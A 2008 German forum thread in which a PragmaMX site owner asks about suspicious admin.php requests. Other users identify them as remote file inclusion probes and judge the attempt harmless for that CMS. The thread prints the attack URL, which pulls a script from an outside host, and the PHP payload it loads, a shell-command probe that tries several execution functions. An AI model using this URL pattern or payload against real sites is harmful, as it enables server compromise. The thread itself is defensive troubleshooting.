Fremde IPs im Adminbereich?

Begonnen von Pac06, 02 Januar 2008, 18:07:10

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Pac06

Hallo Zusammen,

als ich mir eben im Who-is-online-Modul die Gäste angeschaut habe, ist mir aufgefallen, dass sich mehrere IPs im Adminbereich unter folgender Domain aufhalten:

http://www.bonusjaeger.de/admin.php?include_path=http://jorgevolio.com/.cookies/id.txt?

Versucht sich hier jemand unerlaubt Zugang zu verschaffen, oder muss man sich das keine Sorgen machen?

Danke und frohes neues Jahr
Henning
Geld verdienen im Internet
Bonusjaeger.de

using PragmaMX 0.1.9

StegRene

Da da offensichtlich irgendwas von einer fremden Seite included wird, glaube ich, zurücklehnen wäre das Letzte, was Du tun solltest.

Nun bin ich aber leider nicht fit genug, die zu sagen, ob das da sehr schlimm ist ;)
Ich denke, da wird sich wer vom Pragma-Team besser äussern können, die kennen sich mit sowas sicher aus.

Und das, was da included wird:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo 
$eseguicmd;
function 
ex($cfe){
$res '';
if (!empty(
$cfe)){
if(
function_exists('exec')){
@
exec($cfe,$res);
$res join("\n",$res);
}
elseif(
function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(
function_exists('system')){
@
ob_start();
@
system($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(
function_exists('passthru')){
@
ob_start();
@
passthru($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(@
is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@
feof($f)) { $res .= @fread($f,1024); }
@
pclose($f);
}}
return 
$res;
}
exit;


...............gefällt mir gar nicht!

Pac06

Hallo und vielen Dank für Deine schnelle Antwort!


Auch wenn ich mich nun schon etwas länger mit PragmaMx beschäftigt habe und einige Sachen selbstständig hinbekomme, so kann ich mit dem vorliegenden Code leider gar nix anfangen. Da das die erste Auffälligkeit in dieser Richtung ist, habe ich mich jetzt auch mit dem Thema Sicherheit nur wenig auseinander gesetzt und bin auf eure Hilfe angewiesen...

Wie sollte ich weiter vorgehen?

Habe ein Backup der Datenbank gemacht und die Passwörter geändert, außerdem hab ich alle Sicherheitsfunktionen von Pragma aktiviert.

Z.Zt. keine Auffälligkeiten im Who-is-Online-Modul...


Danke und MfG
Henning
Geld verdienen im Internet
Bonusjaeger.de

using PragmaMX 0.1.9

m-t

Zitat von: Pac06 am 02 Januar 2008, 18:07:10
Versucht sich hier jemand unerlaubt Zugang zu verschaffen, oder muss man sich das keine Sorgen machen?

jo, der denkt er hat nuke vor sich ;-)
lass ihn nur machen, wird ihm nix bringen

Barbeytes

Hallo,

schau Dir mal diese Seite an:

http://www.bot-trap.de

Vielleicht hilft Dir das weiter?

Gruß
Guido

StegRene

Zitat von: m-t am 02 Januar 2008, 18:57:49
jo, der denkt er hat nuke vor sich ;-)
lass ihn nur machen, wird ihm nix bringen

Dann is ja gut, unschön ist trotzdem.............

Pac06

Yep, ein ungutes Gefühl bleibt.

Zum Glück hab ich mich von Pragma überzeugen lassen, bei Nuke wäre sie dann wohl schon wieder drinne gewesen   :thumbup:

Also nicht weiter davon stören lassen, oder sind noch irgendwelche Schritte zu empfehlen?

Zitatschau Dir mal diese Seite an:

http://www.bot-trap.de
Danke, werde mich da mal umsehen...!


Vielen Dank an Alle für die schnelle Hilfe!
Grüße Henning
Geld verdienen im Internet
Bonusjaeger.de

using PragmaMX 0.1.9